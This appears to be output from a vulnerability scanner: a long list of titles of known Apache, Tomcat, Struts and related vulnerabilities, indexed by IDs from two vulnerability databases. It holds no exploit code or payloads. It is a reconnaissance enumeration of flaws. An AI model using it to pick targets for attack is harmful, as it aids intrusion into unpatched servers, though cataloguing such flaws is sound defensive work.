| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
| [20527] Apache Mod_TCL Remote Format String Vulnerability
| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
| [19106] Apache Tomcat Information Disclosure Vulnerability
| [18138] Apache James SMTP Denial Of Service Vulnerability
| [17342] Apache Struts Multiple Remote Vulnerabilities
| [17095] Apache Log4Net Denial Of Service Vulnerability
| [16916] Apache mod_python FileSession Code Execution Vulnerability
| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
| [15177] PHP Apache 2 Local Denial of Service Vulnerability
| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
| [14106] Apache HTTP Request Smuggling Vulnerability
| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
| [11471] Apache mod_include Local Buffer Overflow Vulnerability
| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
| [11094] Apache mod_ssl Denial Of Service Vulnerability
| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
| [10478] ClueCentral Apache Suexec Patch Security Weakness
| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
| [9921] Apache Connection Blocking Denial Of Service Vulnerability
4438| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
4439| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
4440| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
4441| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
4442| [9733] Apache Cygwin Directory Traversal Vulnerability
4443| [9599] Apache mod_php Global Variables Information Disclosure Weakness
4444| [9590] Apache-SSL Client Certificate Forging Vulnerability
4445| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
4446| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
4447| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
4448| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
4449| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
4450| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
4451| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
4452| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
4453| [8898] Red Hat Apache Directory Index Default Configuration Error
4454| [8883] Apache Cocoon Directory Traversal Vulnerability
4455| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
4456| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
4457| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
4458| [8707] Apache htpasswd Password Entropy Weakness
4459| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
4460| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
4461| [8226] Apache HTTP Server Multiple Vulnerabilities
4462| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
4463| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
4464| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
4465| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
4466| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
4467| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
4468| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
4469| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
4470| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
4471| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
4472| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
4473| [7255] Apache Web Server File Descriptor Leakage Vulnerability
4474| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
4475| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
4476| [6939] Apache Web Server ETag Header Information Disclosure Weakness
4477| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
4478| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
4479| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
4480| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
4481| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
4482| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
4483| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
4484| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
4485| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
| [6117] Apache mod_php File Descriptor Leakage Vulnerability
| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
| [5992] Apache HTDigest Insecure Temporary File Vulnerability
| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
| [5485] Apache 2.0 Path Disclosure Vulnerability
| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
| [4437] Apache Error Message Cross-Site Scripting Vulnerability
| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
| [3596] Apache Split-Logfile File Append Vulnerability
| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
| [3169] Apache Server Address Disclosure Vulnerability
| [3009] Apache Possible Directory Index Disclosure Vulnerability
| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
| [2216] Apache Web Server DoS Vulnerability
| [2182] Apache /tmp File Race Vulnerability
| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
| [1821] Apache mod_cookies Buffer Overflow Vulnerability
| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
| [1457] Apache::ASP source.asp Example Script Vulnerability
| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [86258] Apache CloudStack text fields cross-site scripting
| [85983] Apache Subversion mod_dav_svn module denial of service
| [85875] Apache OFBiz UEL code execution
| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
| [85871] Apache HTTP Server mod_session_dbd unspecified
| [85756] Apache Struts OGNL expression command execution
| [85755] Apache Struts DefaultActionMapper class open redirect
| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
| [85574] Apache HTTP Server mod_dav denial of service
| [85573] Apache Struts Showcase App OGNL code execution
| [85496] Apache CXF denial of service
| [85423] Apache Geronimo RMI classloader code execution
| [85326] Apache Santuario XML Security for C++ buffer overflow
| [85323] Apache Santuario XML Security for Java spoofing
| [85319] Apache Qpid Python client SSL spoofing
| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
| [84952] Apache Tomcat CVE-2012-3544 denial of service
| [84763] Apache Struts CVE-2013-2135 security bypass
| [84762] Apache Struts CVE-2013-2134 security bypass
| [84719] Apache Subversion CVE-2013-2088 command execution
| [84718] Apache Subversion CVE-2013-2112 denial of service
| [84717] Apache Subversion CVE-2013-1968 denial of service
| [84577] Apache Tomcat security bypass
| [84576] Apache Tomcat symlink
| [84543] Apache Struts CVE-2013-2115 security bypass
| [84542] Apache Struts CVE-2013-1966 security bypass
| [84154] Apache Tomcat session hijacking
| [84144] Apache Tomcat denial of service
| [84143] Apache Tomcat information disclosure
| [84111] Apache HTTP Server command execution
| [84043] Apache Virtual Computing Lab cross-site scripting
| [84042] Apache Virtual Computing Lab cross-site scripting
| [83782] Apache CloudStack information disclosure
| [83781] Apache CloudStack security bypass
| [83720] Apache ActiveMQ cross-site scripting
| [83719] Apache ActiveMQ denial of service
| [83718] Apache ActiveMQ denial of service
| [83263] Apache Subversion denial of service
| [83262] Apache Subversion denial of service
| [83261] Apache Subversion denial of service
| [83259] Apache Subversion denial of service
| [83035] Apache mod_ruid2 security bypass
| [82852] Apache Qpid federation_tag security bypass
| [82851] Apache Qpid qpid::framing::Buffer denial of service
| [82758] Apache Rave User RPC API information disclosure
| [82663] Apache Subversion svn_fs_file_length() denial of service
| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
| [82641] Apache Qpid AMQP denial of service
| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
| [82618] Apache Commons FileUpload symlink
| [82360] Apache HTTP Server manager interface cross-site scripting
| [82359] Apache HTTP Server hostnames cross-site scripting
| [82338] Apache Tomcat log/logdir information disclosure
| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
| [82268] Apache OpenJPA deserialization command execution
| [81981] Apache CXF UsernameTokens security bypass
| [81980] Apache CXF WS-Security security bypass
| [81398] Apache OFBiz cross-site scripting
| [81240] Apache CouchDB directory traversal
| [81226] Apache CouchDB JSONP code execution
| [81225] Apache CouchDB Futon user interface cross-site scripting
| [81211] Apache Axis2/C SSL spoofing
| [81167] Apache CloudStack DeployVM information disclosure
| [81166] Apache CloudStack AddHost API information disclosure
| [81165] Apache CloudStack createSSHKeyPair API information disclosure
| [80518] Apache Tomcat cross-site request forgery security bypass
| [80517] Apache Tomcat FormAuthenticator security bypass
| [80516] Apache Tomcat NIO denial of service
| [80408] Apache Tomcat replay-countermeasure security bypass
| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
| [80317] Apache Tomcat slowloris denial of service
| [79984] Apache Commons HttpClient SSL spoofing
| [79983] Apache CXF SSL spoofing
| [79830] Apache Axis2/Java SSL spoofing
| [79829] Apache Axis SSL spoofing
| [79809] Apache Tomcat DIGEST security bypass
| [79806] Apache Tomcat parseHeaders() denial of service
| [79540] Apache OFBiz unspecified
| [79487] Apache Axis2 SAML security bypass
| [79212] Apache Cloudstack code execution
| [78734] Apache CXF SOAP Action security bypass
| [78730] Apache Qpid broker denial of service
| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
| [78563] Apache mod_pagespeed module unspecified cross-site scripting
| [78562] Apache mod_pagespeed module security bypass
| [78454] Apache Axis2 security bypass
| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
| [78321] Apache Wicket unspecified cross-site scripting
| [78183] Apache Struts parameters denial of service
| [78182] Apache Struts cross-site request forgery
| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
| [77987] mod_rpaf module for Apache denial of service
| [77958] Apache Struts skill name code execution
| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
| [77568] Apache Qpid broker security bypass
| [77421] Apache Libcloud spoofing
| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
| [77046] Oracle Solaris Apache HTTP Server information disclosure
| [76837] Apache Hadoop information disclosure
| [76802] Apache Sling CopyFrom denial of service
| [76692] Apache Hadoop symlink
| [76535] Apache Roller console cross-site request forgery
| [76534] Apache Roller weblog cross-site scripting
| [76152] Apache CXF elements security bypass
| [76151] Apache CXF child policies security bypass
| [75983] MapServer for Windows Apache file include
| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
| [75558] Apache POI denial of service
| [75545] PHP apache_request_headers() buffer overflow
| [75302] Apache Qpid SASL security bypass
| [75211] Debian GNU/Linux apache 2 cross-site scripting
| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
| [74871] Apache OFBiz FlexibleStringExpander code execution
| [74870] Apache OFBiz multiple cross-site scripting
| [74750] Apache Hadoop unspecified spoofing
| [74319] Apache Struts XSLTResult.java file upload
| [74313] Apache Traffic Server header buffer overflow
| [74276] Apache Wicket directory traversal
| [74273] Apache Wicket unspecified cross-site scripting
| [74181] Apache HTTP Server mod_fcgid module denial of service
| [73690] Apache Struts OGNL code execution
| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
| [73100] Apache MyFaces in directory traversal
| [73096] Apache APR hash denial of service
| [73052] Apache Struts name cross-site scripting
| [73030] Apache CXF UsernameToken security bypass
| [72888] Apache Struts lastName cross-site scripting
| [72758] Apache HTTP Server httpOnly information disclosure
| [72757] Apache HTTP Server MPM denial of service
| [72585] Apache Struts ParameterInterceptor security bypass
| [72438] Apache Tomcat Digest security bypass
| [72437] Apache Tomcat Digest security bypass
| [72436] Apache Tomcat DIGEST security bypass
| [72425] Apache Tomcat parameter denial of service
| [72422] Apache Tomcat request object information disclosure
| [72377] Apache HTTP Server scoreboard security bypass
| [72345] Apache HTTP Server HTTP request denial of service
| [72229] Apache Struts ExceptionDelegator command execution
| [72089] Apache Struts ParameterInterceptor directory traversal
| [72088] Apache Struts CookieInterceptor command execution
| [72047] Apache Geronimo hash denial of service
| [72016] Apache Tomcat hash denial of service
| [71711] Apache Struts OGNL expression code execution
| [71654] Apache Struts interfaces security bypass
| [71620] Apache ActiveMQ failover denial of service
| [71617] Apache HTTP Server mod_proxy module information disclosure
| [71508] Apache MyFaces EL security bypass
| [71445] Apache HTTP Server mod_proxy security bypass
| [71203] Apache Tomcat servlets privilege escalation
| [71181] Apache HTTP Server ap_pregsub() denial of service
| [71093] Apache HTTP Server ap_pregsub() buffer overflow
| [70336] Apache HTTP Server mod_proxy information disclosure
| [69804] Apache HTTP Server mod_proxy_ajp denial of service
| [69472] Apache Tomcat AJP security bypass
| [69396] Apache HTTP Server ByteRange filter denial of service
| [69394] Apache Wicket multi window support cross-site scripting
| [69176] Apache Tomcat XML information disclosure
| [69161] Apache Tomcat jsvc information disclosure
| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
| [68541] Apache Tomcat sendfile information disclosure
| [68420] Apache XML Security denial of service
| [68238] Apache Tomcat JMX information disclosure
| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
| [67804] Apache Subversion control rules information disclosure
| [67803] Apache Subversion control rules denial of service
| [67802] Apache Subversion baselined denial of service
| [67672] Apache Archiva multiple cross-site scripting
| [67671] Apache Archiva multiple cross-site request forgery
| [67564] Apache APR apr_fnmatch() denial of service
| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
| [67515] Apache Tomcat annotations security bypass
| [67480] Apache Struts s:submit information disclosure
| [67414] Apache APR apr_fnmatch() denial of service
| [67356] Apache Struts javatemplates cross-site scripting
| [67354] Apache Struts Xwork cross-site scripting
| [66676] Apache Tomcat HTTP BIO information disclosure
| [66675] Apache Tomcat web.xml security bypass
| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
| [66241] Apache HttpComponents information disclosure
| [66154] Apache Tomcat ServletSecurity security bypass
| [65971] Apache Tomcat ServletSecurity security bypass
| [65876] Apache Subversion mod_dav_svn denial of service
| [65343] Apache Continuum unspecified cross-site scripting
| [65162] Apache Tomcat NIO connector denial of service
| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
| [65160] Apache Tomcat HTML Manager interface cross-site scripting
| [65159] Apache Tomcat ServletContect security bypass
| [65050] Apache CouchDB web-based administration UI cross-site scripting
| [64773] Oracle HTTP Server Apache Plugin unauthorized access
| [64473] Apache Subversion blame -g denial of service
| [64472] Apache Subversion walk() denial of service
| [64407] Apache Axis2 CVE-2010-0219 code execution
| [63926] Apache Archiva password privilege escalation
| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
| [63493] Apache Archiva credentials cross-site request forgery
| [63477] Apache Tomcat HttpOnly session hijacking
| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
| [62959] Apache Shiro filters security bypass
| [62790] Apache Perl cgi module denial of service
| [62576] Apache Qpid exchange denial of service
| [62575] Apache Qpid AMQP denial of service
| [62354] Apache Qpid SSL denial of service
| [62235] Apache APR-util apr_brigade_split_line() denial of service
| [62181] Apache XML-RPC SAX Parser information disclosure
| [61721] Apache Traffic Server cache poisoning
| [61202] Apache Derby BUILTIN authentication functionality information disclosure
| [61186] Apache CouchDB Futon cross-site request forgery
| [61169] Apache CXF DTD denial of service
| [61070] Apache Jackrabbit search.jsp SQL injection
| [61006] Apache SLMS Quoting cross-site request forgery
| [60962] Apache Tomcat time cross-site scripting
| [60883] Apache mod_proxy_http information disclosure
| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
| [60264] Apache Tomcat Transfer-Encoding denial of service
| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
| [59413] Apache mod_proxy_http timeout information disclosure
| [59058] Apache MyFaces unencrypted view state cross-site scripting
| [58827] Apache Axis2 xsd file include
| [58790] Apache Axis2 modules cross-site scripting
| [58299] Apache ActiveMQ queueBrowse cross-site scripting
| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
| [58056] Apache ActiveMQ .jsp source code disclosure
| [58055] Apache Tomcat realm name information disclosure
| [58046] Apache HTTP Server mod_auth_shadow security bypass
| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
| [57429] Apache CouchDB algorithms information disclosure
| [57398] Apache ActiveMQ Web console cross-site request forgery
| [57397] Apache ActiveMQ createDestination.action cross-site scripting
| [56653] Apache HTTP Server DNS spoofing
| [56652] Apache HTTP Server DNS cross-site scripting
| [56625] Apache HTTP Server request header information disclosure
| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
| [56623] Apache HTTP Server mod_proxy_ajp denial of service
| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
| [55857] Apache Tomcat WAR files directory traversal
| [55856] Apache Tomcat autoDeploy attribute security bypass
| [55855] Apache Tomcat WAR directory traversal
| [55210] Intuit component for Joomla! Apache information disclosure
| [54533] Apache Tomcat 404 error page cross-site scripting
| [54182] Apache Tomcat admin default password
| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
| [53666] Apache HTTP Server Solaris pollset support denial of service
| [53650] Apache HTTP Server HTTP basic-auth module security bypass
| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
| [53041] mod_proxy_ftp module for Apache denial of service
| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
| [51953] Apache Tomcat Path Disclosure
| [51952] Apache Tomcat Path Traversal
| [51951] Apache stronghold-status Information Disclosure
| [51950] Apache stronghold-info Information Disclosure
| [51949] Apache PHP Source Code Disclosure
| [51948] Apache Multiviews Attack
| [51946] Apache JServ Environment Status Information Disclosure
| [51945] Apache error_log Information Disclosure
| [51944] Apache Default Installation Page Pattern Found
| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
| [51942] Apache AXIS XML External Entity File Retrieval
| [51941] Apache AXIS Sample Servlet Information Leak
| [51940] Apache access_log Information Disclosure
| [51626] Apache mod_deflate denial of service
| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
| [51365] Apache Tomcat RequestDispatcher security bypass
| [51273] Apache HTTP Server Incomplete Request denial of service
| [51195] Apache Tomcat XML information disclosure
| [50994] Apache APR-util xml/apr_xml.c denial of service
| [50993] Apache APR-util apr_brigade_vprintf denial of service
